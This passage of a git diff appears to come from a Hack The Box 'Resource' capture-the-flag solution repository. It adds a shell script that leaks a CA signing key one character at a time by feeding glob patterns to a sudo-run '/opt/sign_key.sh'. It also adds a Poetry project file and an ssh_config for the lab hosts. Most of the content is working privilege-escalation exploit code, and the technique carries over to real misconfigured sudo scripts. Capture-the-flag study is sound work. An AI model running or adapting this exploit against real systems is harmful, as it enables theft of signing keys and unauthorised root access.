+  done
+  printf '%d' "$i"
+}
+
+sch_sarray_append() {
+  sarray=$1
+  shift
+  if sch_sarray_is_empty "$sarray"; then
+    printf '%s' "$*"
+  else
+    printf '%s' "$sarray $*"
+  fi
+}
+
+sch_sarray_take() {
+  sarray=$1
+  n="$2"
+  result=''
+  i=0
+  for element in $sarray; do
+    if [ "$i" -eq "$n" ]; then
+      break
+    fi
+    result=$(sch_sarray_append "$result" "$element")
+    i=$((i + 1))
+  done
+  printf '%s' "$result"
+}
+
+sch_sarray_skip() {
+  sarray=$1
+  n=$2
+  result=''
+  i=0
+  for element in $sarray; do
+    if [ "$i" -ge "$n" ]; then
+      result=$(sch_sarray_append "$result" "$element")
+    fi
+    i=$((i + 1))
+  done
+  printf '%s' "$result"
+}
+
+sch_sarray_first() {
+  sarray=$1
+  result=''
+  for element in $sarray; do
+    printf '%s' "$element"
+    return 0
+  done
+  return 1
+}
+
+custom='- = + / \040 \n'
+uppercase="A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"
+lowercase="a b c d e f g h i j k l m n o p q r s t u v w x y z"
+digits="0 1 2 3 4 5 6 7 8 9"
+charset="$custom $uppercase $lowercase $digits"
+
+ca="/tmp/x"
+
+known=""
+
+check() {
+  printf -- "$1" > "$ca"
+  sudo /opt/sign_key.sh "$ca" /dev/null root _ 10086 2>/dev/null | grep API >/dev/null
+}
+
+check_pattern() {
+  known=$1
+  pattern=$2
+  check "$known$pattern*"
+}
+
+pattern_in() {
+  sarray=$1
+  pattern='['
+  for c in $sarray; do
+    pattern="$pattern$c"
+  done
+  pattern="$pattern]"
+  printf '%s' "$pattern"
+}
+
+
+search_among() {
+  sarray=$1
+  callback=$2
+  [ -z "$callback" ] && return 1
+  shift; shift
+  n=$(sch_sarray_len "$sarray")
+  partition0=$(sch_sarray_take "$sarray" $((n / 2)))
+  pattern0=$(pattern_in "$partition0")
+  partition1=$(sch_sarray_skip "$sarray" $((n / 2)))
+  pattern1=$(pattern_in "$partition1")
+  if ! sch_sarray_is_empty "$partition0" && ($callback "$@" "$pattern0"); then
+    if [ $(sch_sarray_len "$partition0") -eq 1 ]; then
+      sch_sarray_first "$partition0"
+      return 0
+    else
+      search_among "$partition0" "$callback" "$@"
+      return $?
+    fi
+  elif ! sch_sarray_is_empty "$partition1" && ($callback "$@" "$pattern1"); then
+    if [ $(sch_sarray_len "$partition1") -eq 1 ]; then
+      sch_sarray_first "$partition1"
+      return 0
+    else
+      search_among "$partition1" "$callback" "$@"
+      return $?
+    fi
+  fi
+  return 1
+}
+
+while true; do
+  c=$(search_among "$charset" check_pattern "$known")
+  if [ $? -eq 0 ]; then
+    known="$known$c"
+    if check $known; then
+      printf "ok:\n$known\n" >&2
+      printf -- "$known"
+      break
+    fi
+  else
+    printf "stuck at:\n$known\n" >&2
+    break
+  fi
+done
+
+rm "$ca"
diff --git a/pyproject.toml b/pyproject.toml
@@ -0,0 +1,18 @@
+[tool.poetry]
+name = "htb-season-6-resource"
+version = "0.1.0"
+description = ""
+authors = ["y5c4l3 <y5c4l3@proton.me>"]
+license = "MIT"
+readme = "README.md"
+
+[tool.poetry.dependencies]
+python = "^3.10"
+
+
+[tool.poetry.group.dev.dependencies]
+requests = "^2.32.3"
+
+[build-system]
+requires = ["poetry-core"]
+build-backend = "poetry.core.masonry.api"
diff --git a/ssh_config b/ssh_config
@@ -0,0 +1,17 @@
+Host itrc
+  Hostname itrc.ssg.htb
+  IdentityFile ./keys/id_self
+  IdentitiesOnly yes
+  CertificateFile ./keys/id_self-itrc.pub
+Host mitrc
+  Hostname itrc.ssg.htb
+  User msainristil
+  IdentityFile ./keys/id_self
+  IdentitiesOnly yes
+Host ssg
+  Hostname signserv.ssg.htb
+  Port 2222
+  IdentityFile ./keys/id_self
+  IdentitiesOnly yes
+  CertificateFile ./keys/id_self-remote.pub
+  CertificateFile ./keys/id_self-ssg.pub